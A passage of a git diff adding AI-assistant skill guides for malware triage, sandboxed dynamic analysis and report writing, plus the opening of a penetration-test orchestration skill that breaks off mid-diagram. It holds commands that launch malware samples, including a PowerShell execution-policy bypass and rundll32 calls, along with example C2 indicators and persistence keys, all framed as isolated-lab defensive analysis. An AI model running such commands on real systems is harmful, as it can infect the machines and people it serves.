+net use  # Windows
+df -h    # Linux
+```
+
+**2. Start Monitoring Tools:**
+
+Launch in this order:
+1. **Procmon** (Process Monitor) - File/Registry/Process activity
+2. **Wireshark** - Network traffic capture
+3. **Process Hacker** - Process/memory monitoring
+4. **Regshot** - Take "before" snapshot (optional)
+
+**3. Establish Baseline:**
+- Take note of running processes
+- Document open network connections
+- Record current registry state (if using Regshot)
+
+### Phase 2: Malware Execution (Variable Duration)
+
+**Execute the Sample:**
+
+```powershell
+# For PE executables
+.\sample.exe
+
+# With arguments (if required)
+.\sample.exe /install /silent
+
+# For DLLs
+rundll32.exe sample.dll,DllMain
+rundll32.exe sample.dll,ExportedFunction
+
+# For scripts
+powershell.exe -ExecutionPolicy Bypass -File sample.ps1
+cscript.exe //NoLogo sample.vbs
+wscript.exe sample.js
+```
+
+**Observation Duration:**
+- **Minimum:** 5 minutes (most malware acts quickly)
+- **Standard:** 15 minutes (catch delayed execution)
+- **Extended:** 60+ minutes (for time-based evasion)
+
+**What to Watch:**
+- New processes spawned
+- Network connections initiated
+- Files created/modified/deleted
+- Registry keys modified
+- CPU/Memory usage spikes
+- Pop-ups or UI changes
+- Error messages
+
+### Phase 3: Process Monitoring
+
+**Using Process Hacker:**
+
+**Track New Processes:**
+1. Watch for new entries in process list
+2. Note parent-child relationships
+3. Document command-line arguments
+4. Check process integrity levels
+5. Monitor memory allocations
+
+**Identify Process Injection:**
+- Look for RWX (Read-Write-Execute) memory regions
+- Check for threads in unexpected processes
+- Monitor for process hollowing indicators
+- Watch for CreateRemoteThread calls
+
+**Memory Analysis:**
+```
+Right-click process → Memory → Inspect
+Look for:
+- Suspicious memory regions (RWX permissions)
+- Injected DLLs (not in system path)
+- Decoded strings in memory
+- Configuration data
+
+Right-click process → Create Dump File
+→ Save for later Volatility analysis
+```
+
+### Phase 4: File System Monitoring
+
+**Using Procmon (Process Monitor):**
+
+**Configure Filters:**
+```
+Filter → Add:
+- Process Name → is → sample.exe → Include
+- Operation → contains → File → Include
+- Operation → contains → Reg → Include
+- Process Name → is → explorer.exe → Exclude
+- Process Name → is → svchost.exe → Exclude (unless suspicious)
+```
+
+**Monitor File Operations:**
+
+Look for:
+- **CreateFile** - Files being created
+- **WriteFile** - Files being modified
+- **DeleteFile** - Files being deleted
+- **SetRenameInformationFile** - Files being renamed
+
+**Key Locations to Watch:**
+```
+C:\Users\<user>\AppData\Local\Temp\
+C:\Users\<user>\AppData\Roaming\
+C:\ProgramData\
+C:\Windows\Temp\
+C:\Users\<user>\AppData\Local\
+```
+
+**Extract Dropped Files:**
+```powershell
+# Find recently created files (last 5 minutes)
+Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue |
+  Where-Object {$_.CreationTime -gt (Get-Date).AddMinutes(-5)}
+
+# Hash all dropped files
+Get-ChildItem -Path C:\Users\<user>\AppData\Local\Temp\ |
+  Get-FileHash -Algorithm SHA256 |
+  Format-Table Hash, Path
+```
+
+### Phase 5: Registry Monitoring
+
+**Using Procmon:**
+
+**Filter for Registry Operations:**
+```
+Operation → contains → Reg → Include
+```
+
+**Common Registry Operations:**
+- **RegCreateKey** - Creating new keys
+- **RegSetValue** - Writing values
+- **RegQueryValue** - Reading values
+- **RegDeleteKey** - Deleting keys
+
+**Critical Registry Locations:**
+
+**Persistence Mechanisms:**
+```
+HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+HKLM\System\CurrentControlSet\Services (new services)
+```
+
+### Phase 6: Network Behavior Analysis
+
+**Using Wireshark:**
+
+**Display Filters:**
+```
+# DNS queries
+dns
+
+# HTTP traffic
+http
+
+# HTTPS/TLS
+tls
+
+# Specific IP address
+ip.addr == 192.168.1.100
+
+# Specific port
+tcp.port == 443 || udp.port == 443
+```
+
+**What to Capture:**
+
+**DNS Queries:**
+```bash
+# Extract all DNS queries
+tshark -r capture.pcapng -Y dns.qry.name -T fields -e dns.qry.name | sort -u
+
+Look for:
+- Domain names contacted
+- DGA (Domain Generation Algorithm) patterns
+- Fast-flux DNS indicators
+- Known C2 domains
+```
+
+**HTTP/HTTPS Traffic:**
+```bash
+# Extract HTTP requests
+tshark -r capture.pcapng -Y http.request -T fields -e http.host -e http.request.uri
+
+Look for:
+- C2 server URLs
+- Download locations
+- POST data (exfiltration)
+- Suspicious User-Agents
+- Beacon patterns (regular intervals)
+```
+
+**Extract Network IOCs:**
+```bash
+# All contacted IPs
+tshark -r capture.pcapng -T fields -e ip.dst | sort -u | grep -v "192.168\|10.0\|127.0"
+
+# All contacted domains
+tshark -r capture.pcapng -Y dns -T fields -e dns.qry.name | sort -u
+```
+
+### Phase 7: Advanced Monitoring
+
+**Using Sysmon (Windows Event Logging):**
+
+**Setup:**
+```powershell
+# Install with SwiftOnSecurity config
+sysmon64.exe -accepteula -i sysmonconfig.xml
+```
+
+**Key Event IDs:**
+- **Event ID 1** - Process Creation
+- **Event ID 3** - Network Connection
+- **Event ID 5** - Process Terminated
+- **Event ID 7** - Image Loaded (DLL)
+- **Event ID 8** - CreateRemoteThread (injection)
+- **Event ID 10** - Process Access
+- **Event ID 11** - File Created
+- **Event ID 12/13** - Registry Events
+
+### Phase 8: Persistence Analysis
+
+**Check All Persistence Mechanisms:**
+
+**Run Keys:**
+```powershell
+Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
+Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
+```
+
+**Scheduled Tasks:**
+```powershell
+Get-ScheduledTask | Where-Object {$_.TaskName -notlike "Microsoft*"} | Format-Table
+```
+
+**Services:**
+```powershell
+Get-Service | Where-Object {$_.StartType -ne "Disabled"} | Format-Table
+```
+
+### Phase 9: Artifact Collection
+
+**Export All Evidence:**
+
+**Process Monitor:**
+```
+File → Save → All Events → CSV format
+→ Save as: procmon_output.csv
+```
+
+**Wireshark:**
+```
+File → Export Specified Packets → All packets
+→ Save as: network_capture.pcapng
+```
+
+**Process Hacker:**
+```
+File → Save All → processes.txt
+(Optional) Right-click process → Create dump file → memory_dump.dmp
+```
+
+**Dropped Files:**
+```powershell
+# Copy all dropped files with hashes
+$evidence = "C:\evidence\dropped_files"
+New-Item -Path $evidence -ItemType Directory -Force
+
+Get-ChildItem -Path "C:\Users\<user>\AppData\Local\Temp" |
+  ForEach-Object {
+    Copy-Item $_.FullName -Destination $evidence
+    Get-FileHash $_.FullName -Algorithm SHA256
+  }
+```
+
+### Phase 10: Cleanup and Reset
+
+**Before Reverting VM:**
+1. All evidence exported and saved
+2. Hashes calculated for all artifacts
+3. Network captures saved
+4. Process dumps saved (if needed)
+5. Screenshots organized
+
+**Revert to Clean Snapshot:**
+```
+VMware: VM → Snapshot → Revert to Snapshot
+VirtualBox: Machine → Close → Restore current snapshot
+```
+
+## Automated Sandbox Analysis
+
+### ANY.RUN (Interactive Cloud Sandbox)
+
+**When to Use:**
+- Need quick behavioral analysis
+- Want to interact with malware during execution
+- Need visual demonstration of behavior
+- Time-constrained analysis
+
+**Workflow:**
+1. Upload sample to https://app.any.run
+2. Select Windows version
+3. Choose network simulation
+4. Click "Run"
+5. Monitor real-time: process tree, network requests, file operations
+6. Download artifacts: PCAP, process dumps, dropped files, IOCs
+
+## Behavioral IOC Extraction
+
+**From Dynamic Analysis, Extract:**
+
+**Process IOCs:**
+```
+Process Name: sample.exe
+Parent Process: explorer.exe
+Command Line: C:\Users\Public\sample.exe /install
+Child Processes: cmd.exe, powershell.exe
+Mutex: Global\UniqueMalwareMutex
+```
+
+**File IOCs:**
+```
+Created Files:
+- C:\Users\<user>\AppData\Local\Temp\payload.exe (SHA256: abc123...)
+- C:\ProgramData\config.dat
+```
+
+**Registry IOCs:**
+```
+Created Keys:
+HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender
+  Value: C:\Users\Public\malware.exe
+```
+
+**Network IOCs:**
+```
+DNS Queries:
+- malicious-c2[.]com
+- backup-server[.]tk
+
+HTTP Requests:
+- hxxp://malicious-c2[.]com/api/checkin
+  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
+```
+
+## Quality Checklist
+
+Before concluding dynamic analysis:
+
+**Execution Environment:**
+- [ ] VM properly isolated (verified)
+- [ ] All monitoring tools captured data
+- [ ] Execution time sufficient (15+ minutes minimum)
+- [ ] Clean snapshot available for re-analysis
+
+**Process Monitoring:**
+- [ ] All spawned processes documented
+- [ ] Process tree captured
+- [ ] Command-line arguments recorded
+- [ ] Process injection observed (if any)
+- [ ] Memory dumps saved (if relevant)
+
+**File System:**
+- [ ] All dropped files identified and hashed
+- [ ] File paths documented
+- [ ] Dropped files saved to evidence
+- [ ] File modifications logged
+- [ ] Deletion activities recorded
+
+**Registry:**
+- [ ] Persistence mechanisms identified
+- [ ] Registry changes documented
+- [ ] Configuration keys noted
+- [ ] Registry export saved
+
+**Network:**
+- [ ] Full PCAP captured
+- [ ] DNS queries extracted
+- [ ] C2 servers identified
+- [ ] Network protocols documented
+- [ ] Data exfiltration noted
+
+**Evidence Collection:**
+- [ ] All artifacts exported
+- [ ] Hashes calculated
+- [ ] Timestamps recorded (UTC)
+- [ ] Screenshots saved
+- [ ] Logs organized in case folder
+
+## Best Practices
+
+### Do:
+- Always take VM snapshot before execution
+- Run monitoring tools BEFORE executing malware
+- Document observations in real-time
+- Capture evidence continuously
+- Verify network isolation
+- Use multiple monitoring tools
+- Save everything (disk is cheap)
+- Test IOCs for accuracy
+- Document timeline of events
+
+### Don't:
+- Execute without proper isolation
+- Trust timestamps from malware
+- Assume short execution time is sufficient
+- Execute on production systems (NEVER!)
+- Share VM with other activities
+- Enable internet without INetSim
+- Forget to export evidence before reverting
+- Rely on single monitoring tool
+- Skip documentation during execution
+
+## Integration with Report Writing
+
+Dynamic analysis provides:
+- **Execution Flow** → Report: Technical Analysis section
+- **Process Activity** → Report: Behavior Analysis
+- **Network IOCs** → Report: Network Indicators
+- **File IOCs** → Report: File Indicators
+- **Persistence** → Report: Persistence Mechanisms
+- **Screenshots** → Report: Appendix
+- **Timeline** → Report: Execution Timeline
+
+Use findings to:
+- Validate static analysis hypotheses
+- Create behavioral YARA rules
+- Write Sigma detection rules
+- Develop hunting queries
+- Document MITRE ATT&CK techniques
+
+## Example Usage
+
+**User request:** "Help me safely execute this ransomware sample and document its behavior"
+
+**Workflow:**
+1. Verify VM isolation and safety checklist
+2. Guide monitoring tool setup (Procmon, Wireshark, Process Hacker)
+3. Execute sample with observation
+4. Document process creation and injection
+5. Capture file encryption behavior
+6. Extract ransom note and C2 communications
+7. Collect all artifacts
+8. Generate behavioral IOCs
+9. Create timeline of execution
+10. Prepare findings for report integration
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Safety test**: Verify the pre-execution checklist has all 8 required safety items.
+3. **Phase test**: Check all 10 analysis phases (Preparation through Cleanup) are documented with correct tool commands.
+4. **Procmon test**: Validate Procmon filter syntax and file/registry operation descriptions are accurate.
+5. **Network test**: Verify Wireshark display filters and tshark extraction commands are syntactically correct.
+6. **Sysmon test**: Confirm all key Event IDs are documented with correct descriptions.
+7. **Integration test**: Confirm referenced skills (malware-triage, malware-report-writer, detection-engineer) exist.

--- a/internal/assets/skills/malware-report-writer/SKILL.md
+++ b/internal/assets/skills/malware-report-writer/SKILL.md
@@ -1,0 +1,237 @@
+---
+name: malware-report-writer
+description: "Create professional malware analysis reports. Trigger: writing analysis reports, documenting malware samples, creating executive summaries, or formatting IOCs."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# Malware Report Writer
+
+Create professional, comprehensive malware analysis reports for enterprise security teams, incident response, and threat intelligence.
+
+## When to Use This Skill
+
+Use this skill when the user needs to:
+- Create a complete malware analysis report from analysis findings
+- Structure analysis results into professional documentation
+- Write executive summaries for malware samples
+- Format IOCs and detection rules for delivery
+- Review or improve existing malware reports
+- Prepare report documentation for stakeholders
+
+## Quick Start
+
+### Creating a New Report
+
+1. Use the report template below as the base structure
+2. Gather all analysis artifacts:
+   - Sample hashes and file information
+   - Static analysis findings (strings, imports, PE structure)
+   - Dynamic analysis observations (processes, registry, network, files)
+   - IOCs identified
+   - Detection rules created
+3. Populate each section systematically
+4. Review against the quality checklist
+
+### Report Structure
+
+The standard report includes these sections in order:
+
+1. **Executive Summary** - High-level overview for non-technical stakeholders
+2. **Sample Information** - Basic file metadata and hashes
+3. **Static Analysis** - File structure, strings, imports/exports, resources
+4. **Dynamic Analysis** - Runtime behavior, system changes, network activity
+5. **IOCs** - Organized by type (file, network, host indicators)
+6. **Detection Rules** - YARA rules and optionally Sigma rules
+7. **Malware Classification** - Family, type, capabilities
+8. **Remediation and Mitigation** - Actionable response steps
+9. **Technical Details** - Additional deep-dive analysis
+10. **Conclusion** - Final summary and assessment
+11. **References** - External resources and links
+12. **Appendix** - Timeline, tools used, screenshots
+
+## Key Principles
+
+### Professional Quality
+- Use precise technical language with clear explanations
+- Include all three hash types (MD5, SHA1, SHA256)
+- Provide full context for every finding
+- Document methodology and tools used
+- Include timestamps and version information
+
+### Professional Report Requirements
+Industry-standard reports require:
+- Complete technical documentation of malware samples
+- Professional format suitable for enterprise delivery
+- Working detection rules based on malware characteristics
+- Clear IOCs that can be operationalized
+
+**Critical:** The quality of your report reflects your professionalism. Allocate sufficient time for writing and review.
+
+### Audience Awareness
+Structure content for multiple audiences:
+- **Executive Summary**: Non-technical decision makers
+- **Technical Sections**: Security analysts and researchers
+- **IOCs/Detection**: SOC teams and detection engineers
+- **Remediation**: Incident responders
+
+## Writing Guidelines
+
+### Executive Summary
+- 2-4 paragraphs maximum
+- Plain language, minimal jargon
+- Answer: What? How critical? What actions?
+- Include key findings in bullet points
+
+### Technical Analysis
+- Document both positive and negative findings
+- Provide evidence for every claim
+- Use code blocks for technical artifacts
+- Include screenshots when they add value
+- Connect behaviors to specific evidence
+
+### IOCs Section
+**Format:**
+- Group by type (file, network, host)
+- Include context for each indicator
+- Provide confidence levels if uncertain
+- Test IOCs for accuracy before including
+
+**Avoid:**
+- Environment-specific artifacts
+- Personal/analyst system information
+- Common legitimate values
+- Untested indicators
+
+### Detection Rules
+**YARA Rules:**
+- Test against sample (must detect)
+- Test against clean files (must not false positive)
+- Include metadata: author, date, description, hash
+- Use meaningful string and variable names
+- Add comments explaining detection logic
+- Set appropriate conditions to balance detection and false positives
+
+**Best practices:**
+```yara
+rule Malware_Family_Variant {
+    meta:
+        description = "Detects Malware_Family based on C2 configuration"
+        author = "Analyst Name"
+        date = "2025-10-25"
+        hash = "abc123..."
+        reference = "Internal analysis"
+
+    strings:
+        $c2_config = { 48 8B ?? ?? ?? ?? ?? 48 8D ?? ?? }  // Config access pattern
+        $ua_string = "Mozilla/4.0 (Suspicious UA)" ascii
+        $mutex = "Global\\UniqueMalwareMutex" wide
+
+    condition:
+        uint16(0) == 0x5A4D and  // MZ header
+        filesize < 2MB and
+        2 of them
+}
+```
+
+### Common Mistakes to Avoid
+- Over-relying on automated tool output without interpretation
+- Listing findings without explaining significance
+- Missing critical hashes or file metadata
+- Weak or untested detection rules
+- Vague remediation recommendations
+- Poor grammar/spelling
+- Inconsistent formatting
+- Environment-specific artifacts in IOCs
+
+## Time Management Strategies
+
+For efficient malware report creation:
+
+**Recommended workflow:**
+- **Phase 1-2**: Analysis
+  - Document findings continuously (don't wait)
+  - Take screenshots and capture evidence
+  - Create detection rules during analysis
+  - Organize notes by report section
+
+- **Phase 3-4**: Report writing
+  - Draft all technical sections first
+  - Write IOCs, detection rules, remediation
+  - Create executive summary and conclusion
+  - Final quality check and formatting
+
+**Pro tip:** Start documenting in report format during analysis to save time.
+
+## Quality Checklist
+
+Before submitting any report, verify:
+
+**Technical Accuracy:**
+- [ ] All three hash types included and verified
+- [ ] File paths are complete and accurate
+- [ ] Timestamps include timezone
+- [ ] Process IDs included for process activity
+- [ ] Tool versions documented
+
+**Detection Rules:**
+- [ ] YARA rules tested against sample (detects correctly)
+- [ ] YARA rules tested against clean files (no false positives)
+- [ ] Rules include complete metadata
+- [ ] Conditions are appropriate and not over-matching
+
+**IOCs:**
+- [ ] Grouped by type (file, network, host)
+- [ ] Context provided for each IOC
+- [ ] No environment-specific artifacts
+- [ ] All IOCs validated
+
+**Report Quality:**
+- [ ] Executive summary is non-technical and actionable
+- [ ] All sections completed
+- [ ] Grammar and spelling checked
+- [ ] Consistent formatting throughout
+- [ ] Evidence supports all claims
+- [ ] Remediation steps are specific and prioritized
+
+**Professional Standards:**
+- [ ] Report is professional and enterprise-ready
+- [ ] Detection rules work and are well-documented
+- [ ] Technical details demonstrate thorough analysis
+- [ ] Report answers: What is it? What does it do? How to detect? How to remove?
+
+## Output Format
+
+Create reports in Markdown format using the template structure. For professional delivery:
+1. Create report in Markdown using the template
+2. Convert to PDF for professional appearance (if required)
+3. Ensure all sections are complete
+4. Include any screenshots as appendix items
+5. Verify detection rules are included and tested
+
+## Example Usage
+
+**User request:** "Help me write a report for this ransomware sample I analyzed"
+
+**Workflow:**
+1. Load the report template
+2. Ask user for key findings from their analysis
+3. Structure findings into appropriate sections
+4. Help craft executive summary
+5. Format IOCs properly
+6. Review and validate YARA rules
+7. Provide remediation recommendations
+8. Review final report against quality checklist
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Template test**: Validate the 12-section report structure is complete and properly ordered.
+3. **YARA test**: Check the example YARA rule has valid syntax (meta, strings, condition sections).
+4. **Checklist test**: Verify all quality checklist categories (Technical Accuracy, Detection Rules, IOCs, Report Quality, Professional Standards) have complete items.
+5. **Audience test**: Confirm content guidance addresses all 4 audiences (executive, technical, SOC, IR).
+6. **Integration test**: Confirm referenced skills (malware-triage, malware-dynamic-analysis, specialized-file-analyzer, detection-engineer) exist.

--- a/internal/assets/skills/malware-triage/SKILL.md
+++ b/internal/assets/skills/malware-triage/SKILL.md
@@ -1,0 +1,451 @@
+---
+name: malware-triage
+description: "Systematic malware triage workflow. Trigger: performing initial assessment, classifying samples, determining priority, or identifying quick indicators."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# Malware Triage
+
+Systematic workflow for rapid malware assessment, classification, and prioritization for professional malware analysis and enterprise security operations.
+
+## When to Use This Skill
+
+Use this skill when the user needs to:
+- Perform initial assessment of malware samples
+- Quickly classify and prioritize samples
+- Identify key indicators without deep analysis
+- Decide whether to proceed with full analysis
+- Triage multiple samples efficiently
+- Create initial findings summary
+- Predict malware behaviors before dynamic analysis
+
+## Overview
+
+Triage is the critical first phase of malware analysis that:
+1. Quickly identifies key characteristics
+2. Classifies malware type and threat level
+3. Determines analysis priority
+4. Predicts behaviors to guide deeper analysis
+5. Extracts immediate IOCs
+
+**Goal:** Make informed decisions about analysis approach within 5-30 minutes per sample.
+
+## Triage Workflow
+
+### Phase 1: Basic Information Gathering (5 minutes)
+
+**Calculate Hashes:**
+```bash
+sha256sum sample.exe
+md5sum sample.exe
+sha1sum sample.exe
+```
+
+Document:
+- MD5, SHA1, SHA256
+- Original filename
+- File size
+- File type (PE32/PE64/Script/Document)
+
+**Check Online Reputation:**
+- VirusTotal (virustotal.com)
+- MalwareBazaar (bazaar.abuse.ch)
+- Hybrid Analysis
+- Any.Run
+
+Record:
+- Detection rate
+- Known family name (if identified)
+- Previous submission dates
+- Community comments
+
+### Phase 2: Quick Static Analysis (10 minutes)
+
+**For PE Files:**
+1. Check packing/obfuscation
+   - Use Detect It Easy (DIE) or PEiD
+   - Check entropy (>7.0 = likely packed)
+   - Document packer name if identified
+
+2. Examine PE structure
+   - Compilation timestamp
+   - Section names and characteristics
+   - Digital signature status
+   - Entry point location
+   - Overlay data presence
+
+3. Review import table
+   - Note process injection functions
+   - Note network functions
+   - Note anti-analysis functions
+
+4. Extract strings
+   - URLs and IP addresses
+   - File paths
+   - Registry keys
+   - Mutex names
+   - Error messages
+   - Email addresses
+
+**For Scripts (PowerShell, VBS, JavaScript):**
+1. Check obfuscation level
+2. Look for Base64/hex encoding
+3. Identify download/execute patterns
+4. Extract URLs and IPs
+5. Check for embedded payloads
+
+**For Office Documents:**
+1. Check for macros
+2. Examine OLE streams
+3. Look for external references
+4. Check metadata
+5. Identify exploit indicators
+
+### Phase 3: Classification (5 minutes)
+
+**Determine Malware Type:**
+
+Common types:
+- **Trojan/RAT** - Remote access, C2 communication
+- **Ransomware** - File encryption, ransom demands
+- **Infostealer** - Credential theft, browser data
+- **Dropper/Loader** - Delivers additional payloads
+- **Cryptominer** - Cryptocurrency mining
+- **Backdoor** - Persistent remote access
+- **Worm** - Self-propagating
+
+**Assess Threat Level:**
+- **Critical** - Destructive, ransomware, APT
+- **High** - Data theft, full system compromise
+- **Medium** - Limited capabilities, targeted
+- **Low** - Minimal impact, commodity malware
+
+**Evaluate Sophistication:**
+- **Simple** - Basic functionality, no obfuscation
+- **Moderate** - Some protection, standard techniques
+- **Advanced** - Heavy obfuscation, anti-analysis
+- **APT-level** - Custom, targeted, advanced evasion
+
+### Phase 4: Behavior Prediction (5 minutes)
+
+Based on static indicators, predict:
+
+**Process Activity:**
+- Will it create child processes?
+- Process injection expected?
+- Which processes targeted?
+
+**File System:**
+- Files likely to be created (paths)
+- Files likely to be modified
+- Files likely to be deleted
+
+**Registry:**
+- Persistence keys likely to be used
+- Configuration storage locations
+- System modifications expected
+
+**Network:**
+- C2 communication expected?
+- Protocol (HTTP/HTTPS/Raw TCP/IRC/DNS)
+- Beacon interval pattern
+- Data exfiltration likely?
+
+**Persistence:**
+- Mechanism (Run key/Service/Task/Startup)
+- Location and method
+
+### Phase 5: Priority and Decision (5 minutes)
+
+**Determine Priority:**
+
+**Immediate** (analyze now):
+- Unknown samples unclear threat
+- Active incident-related
+- Destructive capabilities
+- APT/targeted indicators
+- Recent threat intel matches
+
+**Standard** (normal queue):
+- Known variant
+- Commodity malware
+- Clear signatures available
+- Historical/research samples
+
+**Low** (defer if needed):
+- Clearly identified common malware
+- Adware/PUP minimal impact
+- Old/outdated samples
+- Likely false positives
+
+**Analysis Decision:**
+
+Proceed with full analysis if:
+- Unknown/new sample
+- Need behavioral confirmation
+- Creating signatures required
+- Investigating specific functionality
+
+Quick report if:
+- Known malware with existing docs
+- Time-constrained triage
+- Clear identification from reputation check
+
+## Triage Report Template
+
+Use this format to document findings:
+
+```markdown
+## Malware Triage Report
+
+**Sample:** [filename]
+**Date:** [date]
+**Analyst:** [name]
+
+### File Information
+- **MD5:** [hash]
+- **SHA1:** [hash]
+- **SHA256:** [hash]
+- **Size:** [bytes]
+- **Type:** [PE32/PE64/Script/etc]
+- **Packed:** [Yes/No - Packer name]
+
+### Online Reputation
+- **VirusTotal:** [XX/YY detections - Link]
+- **Known Family:** [Family name or Unknown]
+- **First Seen:** [Date or Unknown]
+
+### Static Indicators
+
+**PE Analysis:**
+- Compilation Date: [date]
+- Digital Signature: [Valid/Invalid/None]
+- Sections: [names and entropy]
+- Entry Point: [location]
+
+**Suspicious Imports:**
+- [DLL]: [Function, Function, ...]
+- [Key: Process injection, Network, Anti-analysis]
+
+**Notable Strings:**
+- URLs: [list]
+- IPs: [list]
+- Paths: [list]
+- Registry: [list]
+- Mutex: [name if found]
+
+### Classification
+
+**Type:** [Trojan/Ransomware/Infostealer/etc]
+**Threat Level:** [Critical/High/Medium/Low]
+**Sophistication:** [Simple/Moderate/Advanced/APT]
+
+**Primary Capabilities:**
+- [Capability 1]
+- [Capability 2]
+- [Capability 3]
+
+### Predicted Behaviors
+
+**Process Activity:**
+- [Expected behavior]
+
+**File System:**
+- [Expected modifications]
+
+**Registry:**
+- [Expected changes]
+
+**Network:**
+- [Expected communication]
+
+**Persistence:**
+- [Expected mechanism]
+
+### Initial IOCs
+
+**File Indicators:**
+- Hashes listed above
+- [Additional file indicators]
+
+**Network Indicators:**
+- [IPs from strings]
+- [Domains from strings]
+
+**Host Indicators:**
+- [Registry keys]
+- [File paths]
+- [Mutex names]
+
+### Recommendation
+
+**Priority:** [Immediate/Standard/Low]
+
+**Next Steps:**
+1. [Action 1 - e.g., Proceed with full dynamic analysis]
+2. [Action 2 - e.g., Create YARA rule]
+3. [Action 3 - e.g., Search network for IOCs]
+
+**Analysis Approach:**
+[Full analysis / Behavioral confirmation / Quick signature creation]
+
+**Estimated Time:** [time estimate for full analysis]
+```
+
+## Time Management
+
+### Professional Analysis Context
+When analyzing multiple samples, efficient triage is critical:
+
+**Quick Triage (5 min/sample):**
+- Hashes + VirusTotal
+- Basic file info
+- Quick priority decision
+
+**Standard Triage (15 min/sample):**
+- Above + imports analysis
+- String extraction
+- Classification
+- Behavior prediction
+
+**Comprehensive Triage (30 min/sample):**
+- Above + detailed documentation
+- Initial IOC list
+- Full prediction writeup
+- YARA concept notes
+
+**Strategy:**
+- Quick triage ALL samples first
+- Prioritize based on findings
+- Comprehensive triage high-priority samples
+- Defer or quick-report low-priority samples
+
+## Tools and Scripts
+
+### Recommended External Tools
+
+**Static Analysis:**
+- Detect It Easy (DIE) - Packer detection
+- PEStudio - PE analysis
+- strings / FLOSS - String extraction
+- HxD - Hex editor
+- CFF Explorer - PE structure
+
+**Online Services:**
+- VirusTotal - Multi-engine scanning
+- MalwareBazaar - Sample database
+- Hybrid Analysis - Automated analysis
+- Any.Run - Interactive sandbox
+
+## Best Practices
+
+### Do:
+- Always calculate all three hashes immediately
+- Check multiple reputation sources
+- Document findings as you discover them
+- Use checklists to ensure completeness
+- Consider false positive possibilities
+- Predict behaviors before dynamic analysis
+- Prioritize samples logically
+
+### Don't:
+- Skip basic file information
+- Rely solely on VirusTotal results
+- Assume packing means malicious
+- Execute without proper isolation
+- Trust timestamps (easily forged)
+- Ignore negative findings
+- Rush classification decisions
+
+### Efficiency Tips:
+1. Have tools ready and scripts prepared
+2. Use templates for documentation
+3. Automate hash calculation
+4. Keep a reference of common indicators
+5. Build up a personal knowledge base
+6. Take notes during, not after
+7. Use multiple monitors if possible
+
+## Common Triage Scenarios
+
+### Scenario 1: Unknown Executable
+1. Calculate hashes → not found online
+2. Check packing → heavily packed
+3. Review imports → suspicious injection/network APIs
+4. Classification → likely trojan/RAT
+5. Decision → Full analysis required
+
+### Scenario 2: Suspicious Document
+1. Calculate hashes → 0 detections
+2. Check macros → obfuscated VBA
+3. Extract strings → download URLs found
+4. Classification → dropper via macro
+5. Decision → Dynamic analysis of macro behavior
+
+### Scenario 3: Known Malware Variant
+1. Calculate hashes → 50+ detections, identified as Emotet
+2. Review VirusTotal → well-documented
+3. Quick checks → confirms expected indicators
+4. Classification → confirmed Emotet variant
+5. Decision → Quick report, no deep analysis needed
+
+## Integration with Full Analysis
+
+Triage findings guide the full analysis:
+
+**Use predictions to:**
+- Know what to monitor during dynamic analysis
+- Set up appropriate monitoring tools
+- Focus on predicted areas first
+- Validate or refute hypotheses
+
+**Triage report becomes:**
+- Introduction section of full report
+- Hypothesis to test during analysis
+- Quick reference during investigation
+- Foundation for IOC development
+
+## Quality Checklist
+
+Before concluding triage:
+- [ ] All three hashes calculated and verified
+- [ ] Online reputation checked (at least VirusTotal)
+- [ ] File type and basic info documented
+- [ ] Packing status determined
+- [ ] Key imports identified
+- [ ] Notable strings extracted
+- [ ] Classification assigned with reasoning
+- [ ] Threat level assessed
+- [ ] Behaviors predicted
+- [ ] Priority determined
+- [ ] Next steps documented
+- [ ] Initial IOCs listed
+- [ ] Findings clearly documented
+
+## Example Usage
+
+**User request:** "I have a suspicious .exe file, help me triage it"
+
+**Workflow:**
+1. Guide user to calculate hashes
+2. Check online reputation together
+3. Examine PE structure and imports
+4. Extract and review strings
+5. Classify based on indicators
+6. Predict behaviors
+7. Recommend next steps
+8. Create triage report
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Workflow test**: Verify all 5 triage phases (Basic Info, Static Analysis, Classification, Behavior Prediction, Priority) are documented with clear steps.
+3. **Template test**: Validate the triage report template YAML/Markdown renders correctly with all required fields.
+4. **Scenario test**: Check all 3 common triage scenarios (Unknown Executable, Suspicious Document, Known Variant) have complete workflows.
+5. **Checklist test**: Verify the quality checklist has all 13 items present and actionable.
+6. **Integration test**: Confirm referenced skills (malware-dynamic-analysis, specialized-file-analyzer, malware-report-writer) exist.

--- a/internal/assets/skills/pentest-orchestrator/SKILL.md
+++ b/internal/assets/skills/pentest-orchestrator/SKILL.md
@@ -1,0 +1,462 @@
+---
+name: pentest-orchestrator
+description: "Orchestrate multi-phase penetration tests with AI. Trigger: planning pentests, coordinating recon/scanning/exploitation, or adapting strategy mid-engagement."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# Pentest Orchestrator
+
+Structure and coordinate AI-assisted penetration testing engagements with multi-phase workflows, parallel execution streams, adaptive strategy, and finding-driven pivoting.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- **Plan** a structured penetration test with AI assistance
+- **Orchestrate** multiple testing phases (recon → scan → exploit → report)
+- **Coordinate** parallel testing streams for efficiency
+- **Adapt** strategy mid-engagement based on discovered findings
+- **Prioritize** targets and attack vectors dynamically
+- **Track** coverage to ensure comprehensive testing
+- **Generate** professional reports from orchestrated findings
+
+## Orchestration Architecture
+
+### Three-Stream Parallel Model
+
+Run three concurrent streams that feed findings to each other:
+
+```
+┌─────────────────────────────────────────────────────────┐
+│                    ORCHESTRATOR                          │
+│         (Coordinates streams, manages state)             │
+└──────────────┬──────────────┬──────────────┬────────────┘
+               │              │              │
